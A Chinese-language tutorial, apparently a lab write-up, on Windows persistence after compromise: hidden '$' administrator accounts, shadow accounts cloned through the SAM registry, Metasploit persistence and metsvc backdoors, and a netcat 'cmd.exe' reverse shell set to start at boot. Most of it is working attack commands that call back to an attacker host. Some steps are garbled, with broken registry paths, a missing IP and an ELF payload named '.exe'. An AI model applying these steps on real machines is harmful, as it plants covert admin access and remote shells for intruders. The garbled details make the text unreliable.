windows 权限维持

添加影子用户

影子用户顾名思义就是一个隐藏用户，只能通过注册表查看这个用户，其它方式是找不到这个用户的信息的。在用户名后面添加$可以创建匿名的用户再添加到管理员组。 Net user看不到用户，但是在计算机管理里面还是可以看的到。

创建普通账号

net user huahua 123456 /add

net localgroup administrators huahua /add (将用户加入组)
在这里插入图片描述

创建隐藏账户

net user huahua$ 123456 /add

net user 查看huahua$账户已经被隐藏

net localgroup administrators huahua$ /add（将隐藏账号huahua$添加到administrators组中）

在这里插入图片描述

创建影子账号

步骤一：创建快捷方式regedit（注册表编辑器）或者WIN+R–>regedit

在这里插入图片描述

这里SAM没有权限，修改下权限重启即可

在这里插入图片描述

进入SAM下的 DOMIN/ACCOUNT/USERS/NAMES

在这里插入图片描述

在Users目录下有00000XXX开头的文件还有Names
找到Names文件夹下的administrator单击，可以看到右侧的类型，其类型的值便对应着上面00000XXX
选中与administrator所对应的00000XXX在右侧双击F键值，在弹出窗口中将值内容全部复制

#此值要给予要创建的影子账号的F键值中
在Names中找到要修改账户的类型值，找到其对应的00000XXX，并将刚才复制的内容覆盖掉其影子账户的F中的值
导出Names下的影子账户为1.reg
导出Users下影子账户对应的00000XXX为2.reg

在这里插入图片描述
导出文件到桌面

步骤三：删除隐藏账号

net user huahua$ /del #删除隐藏账号huahua$

步骤四：创建隐藏账号生成的桌面图标双击点击是
将1.reg导入到注册表中
将2.reg导入到注册表中

在这里插入图片描述

MSF权限维持Persistence模块

使用MSF维持权限的前提是先获得一个meterpreter shell，通过meterpreter shell获取持久性shell的方法有两种：

第一种：Persistence模块，通过启动项启动(persistence)的方式，在目标机器上以反弹回连。注册表添加信息，做监听

-U：设置后门在用户登录后自启动
-X：设置后门在系统启动后自启动
-S：作为服务自动启动代理程序（具有SYSTEM权限）

生成的相关文件位置：

后门文件位置：

C:WindowsTemp
C:UsersAdministratorAppDataLocalTemp

注册表位置：

HKCUSoftwareMicrosoftWindowsCurrentVersionRun
HKLMSoftwareMicrosoftWindowsCurrentVersionRu

第二种：Metsvc 模块。通过服务(metsvc)启动的方式，在目标机器启动后自启动一个服务，等待连接

后门排查：目标主机上开启了一个Meterpreter服务

实验步骤：

使用下列命令生成一个Linux下反弹shell木马

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.3.106 lport=4444 -f elf -o shell.exe

在这里插入图片描述

kali开启8080服务，win03进入服务器下载shell文件

在这里插入图片描述

在这里插入图片描述
3.

kaili开启msfconsole

在这里插入图片描述
4.

search handler 寻找带有handler的payload

在这里插入图片描述

use exploit/multi/handler

在这里插入图片描述

设置payload set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.3.106

在这里插入图片描述
7。

exploit 建立连接 win03 打开shell 文件

在这里插入图片描述

这样的缺点很明显需要使用Persistence模块输入指令可以让win03自动连接

运行

run persistence -U -i10 -p4444 -r 192.168.3.106

-u为设置用户登录后自动启动

-i 为反向连接时间

-p 反向连接的端口号

-r 反向连接的IP地址

在这里插入图片描述

MSF权限维持Metsvc 模块

通过服务(metsvc)启动的方式，在目标机器启动后自启动一个服务，等待连接

在这里插入图片描述

后门排查：目标主机上开启了一个Meterpreter服务。

在这里插入图片描述

NC自启动

netcat被誉为网络安全界的‘瑞士军刀.一个简单而有用的工具，透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具，能够直接由其它程序和脚本轻松驱动。同时，它也是一个功能强大的网络调试和探测工具，能够建立你需要的几乎所有类型的网络连接。

一种正向连接

首先在服务器上开启一个监听端口 nc -lvvp 4444

在这里插入图片描述

然后在受害者主机执行 nc -t -e cmd.exe 4444

在这里插入图片描述

监听成功

在这里插入图片描述

通常情况下 NC在受害者主机不可能一直运行，有点鸡肋。需要修改受害主机注册表，将上一条命令nc -t -e cmd.exe 4444 设置为开机自启。这样受害主机每一次重启仍然会主动连接到我们服务器
前提是你的服务器也得一直监听端口

启动sys.bat

在这里插入图片描述
配置好命令 ip为服务器kali的IP

在这里插入图片描述
启动路径

监听

在这里插入图片描述

关机重启

在这里插入图片描述

一开机就反弹了一条shell 但是cmd框一直在还是不够隐藏还没有找到解决办法
在这里插入图片描述

添加影子用户

MSF权限维持Persistence模块

MSF权限维持Metsvc 模块

NC自启动

猜你喜欢